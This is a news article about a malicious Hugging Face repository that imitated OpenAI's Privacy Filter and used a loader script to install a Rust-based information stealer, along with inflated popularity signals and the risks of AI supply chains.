The repository, named Open-OSS/privacy-filter, climbed to the top of Hugging Face’s trending list and recorded about 244,000 downloads before access was disabled. Its model card closely mirrored OpenAI’s legitimate Privacy Filter project, a tool designed to detect and redact personally identifiable information in unstructured text. That imitation gave the malicious page the appearance of a credible AI release at a time when developers are rapidly testing open-weight models for use in applications, data pipelines and enterprise systems.
Security analysis found that the repository included a Python file called loader. py and a Windows batch file, start. bat, which users were encouraged to run after cloning the project. The loader contained decoy AI-related code to appear benign, while its hidden function disabled SSL verification, decoded a remote address and fetched a command that was passed to PowerShell. That command then downloaded further components, escalated execution through Windows prompts, added exclusions to Microsoft Defender and launched a Rust-based information stealer.
The final payload targeted browser passwords, cookies, session tokens, encryption keys and browsing data from Chromium- and Gecko-based browsers. It also sought Discord tokens, cryptocurrency wallet data, wallet browser extensions, SSH keys, FTP and VPN credentials, FileZilla configuration files, local databases, system metadata and screenshots. The malware was built to compress and send stolen material to attacker-controlled infrastructure, making even systems without saved passwords vulnerable if active session cookies or OAuth tokens were present.
The campaign’s scale is difficult to measure because the download and like counts appear to have been inflated. Hundreds of likes were attached to the repository, with evidence suggesting many accounts were automated or low-quality. Even if the true number of compromised systems is far below the displayed download total, the incident shows how popularity signals on AI platforms can be manipulated to lower user suspicion. A repository that appears to be widely adopted can move rapidly through developer communities, particularly when it imitates a trusted brand and offers a topical privacy-related tool.
Hugging Face removed the repository after the abuse was reported. Additional repositories linked to the same infrastructure were also identified, including model names designed to resemble high-demand AI releases. Several were uploaded under another account and used similar loader behaviour, suggesting the operators were testing multiple lures rather than relying on a single project. The use of a remote JSON-based command source also allowed the attackers to alter the payload chain without modifying the Hugging Face repository itself.
The attack highlights a sharper risk for organisations that treat AI model hubs as simple download libraries. Modern AI repositories often contain more than model weights: they may include Python scripts, notebooks, configuration files, shell commands and dependency instructions. When such code is executed on workstations used by engineers or data scientists, it can gain access to cloud credentials, source-code repositories, internal APIs and production secrets. That makes AI supply-chain compromise potentially more damaging than a typical consumer malware infection.
Hugging Face already provides malware and unsafe-file scanning across repository contents, including checks triggered at commit time. The latest case shows that automated scanning remains only one layer of defence, particularly when attackers use multi-stage downloaders, public paste services, encoded commands and payloads retrieved after execution. Static scans can miss behaviour that depends on external infrastructure or delayed commands, while social signals such as trending rank may create misplaced trust.
Follow Arabian Post
Select Arabian Post as your preferred source on Google and MSN News for trusted business news and Arab politics and updates.
